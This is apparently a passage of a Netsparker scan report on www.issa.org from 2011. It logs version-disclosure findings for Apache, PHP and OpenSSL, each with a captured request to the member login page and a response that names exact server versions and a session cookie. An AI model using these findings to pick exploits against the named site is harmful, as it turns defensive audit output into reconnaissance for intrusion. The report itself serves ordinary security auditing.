<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
Apache Version Disclosure
Apache Version Disclosure
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
2.2.15 (Unix)
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
PHP Version Disclosure
PHP Version Disclosure
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
PHP/5.2.9
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "MemberNumber"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:block; } div#UsernameIdentification { display:none; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" checked onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class="loginBlock">3. Password</h2> <h3>Password</h3> <input type="password" id="SubmittedPassword" name="SubmittedPassword" class="TextField" /> <p><input type="submit" id="Submit" value="Log In"></p> </td> </tr> </table> </form> </div> <div id="Footer"> <p><a href="..
OpenSSL Version Disclosure
OpenSSL Version Disclosure
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.
Impact
An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
Configure your web server to prevent information leakage from the SERVER
header of its HTTP response.
OpenSSL/0.9.8b
Request
GET /Members/Log-In.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.issa.org
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d959e12eb1519d0294397b6c62589f93; path=/,cookiecheck=issa
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
